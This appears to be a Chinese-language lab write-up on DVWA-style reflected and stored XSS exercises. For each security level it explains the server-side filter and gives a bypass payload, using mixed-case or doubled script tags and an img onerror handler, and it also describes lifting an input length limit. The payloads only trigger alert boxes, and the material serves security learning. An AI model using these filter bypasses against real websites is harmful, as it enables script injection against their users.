xss reflected
low
payload:<script>alert('xxx')</script>
medium
防御措施:使用str_replace函数替换了所有的<script>
绕过:
str_replace对大小写并不敏感,或者双写绕过
payload:<Script>alert('xxx')</script>
<scr<script>ipt>alert('xxx')</script>
high
防御措施
使用preg_replace函数,只要出现script都会被替换为空
绕过
使用img标签
payload:<img src = "" onerror=alert("xss")>
xss(stored)
low
payload:<script>alert('xxx')</script>
medium
防御措施
对message使用htmlspecialchars函数进行了处理,所以无法在这里进行注入
对name使用了str_replace函数进行了处理,将name作为注入的目标
绕过
name对长度有限制,所以通过修改网站源码,将name的长度修改成50,然后进行注入,大写或者双写绕过都可以
payload:<Script>alert('xss')</script>
high
防御:对message进行了htmlspecialchars()的处理,对name进行了preg_replace()的处理,所以在name处注入,并且不能使用<script>标签,所以使用img标签进行注入。
绕过
payload:<img src = "" onerror="alert ('12345')">
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· SQL Server 2025 AI相关能力初探
· 单线程的Redis速度为什么快?
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码